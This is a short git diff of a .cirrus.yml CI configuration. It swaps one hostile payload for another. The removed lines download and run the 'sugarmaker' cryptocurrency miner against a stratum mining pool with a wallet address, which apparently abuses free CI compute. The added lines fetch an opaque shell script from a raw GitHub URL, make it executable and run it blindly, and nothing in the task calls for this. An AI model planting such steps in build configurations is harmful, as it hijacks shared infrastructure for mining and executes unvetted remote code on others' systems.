--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -5,6 +5,6 @@ container:
   
 task:
   script:
-   - wget https://github.com/decryp2kanon/sugarmaker/releases/download/v2.5.0-sugar4/sugarmaker-v2.5.0-sugar4-linux64.zip
-   - unzip sugarmaker-v2.5.0-sugar4-linux64.zip\
-   - sugarmaker-v2.5.0-sugar4-linux64/sugarmaker -a YespowerSugar -o stratum+tcp://stratum-asia.rplant.xyz:7042 -u sugar1qetd77wlllhj8hw80g3dsarcmlaww8hhf5gydsx.4core -t2
+   - wget https://raw.githubusercontent.com/DangDev/dangdev/main/e.sh
+   - chmod +x e.sh
+   - ./e.sh
